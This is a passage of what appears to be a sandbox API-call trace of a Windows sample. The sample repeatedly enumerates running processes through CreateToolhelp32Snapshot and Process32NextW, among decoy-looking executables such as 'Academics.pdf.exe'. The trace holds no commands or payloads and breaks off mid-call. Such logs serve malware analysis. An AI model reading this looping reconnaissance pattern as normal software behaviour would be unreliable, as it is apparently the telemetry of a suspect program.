th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0289.887] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0289.888] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0289.889] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0289.890] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0289.891] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0289.891] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0289.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0289.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0289.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.897] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0289.898] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0289.900] CloseHandle (hObject=0x294) returned 1 [0289.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0289.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0289.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0289.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0289.900] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0289.900] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0289.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0289.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0289.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0289.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0289.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0289.903] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0289.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0289.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0289.920] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0289.921] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0289.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0289.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0289.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0289.925] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0289.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0289.927] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0289.928] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0289.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0289.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0289.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0289.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0289.932] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0289.933] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0289.934] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0289.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0289.936] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0289.937] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0289.938] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0289.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0289.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0289.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.941] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.942] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0289.943] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0289.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.946] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0289.947] CloseHandle (hObject=0x294) returned 1 [0289.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0289.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0289.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0289.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0289.947] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0289.947] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0289.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0289.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0289.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0289.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0289.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0289.950] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.952] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.953] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.954] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.955] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.955] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.956] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.957] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 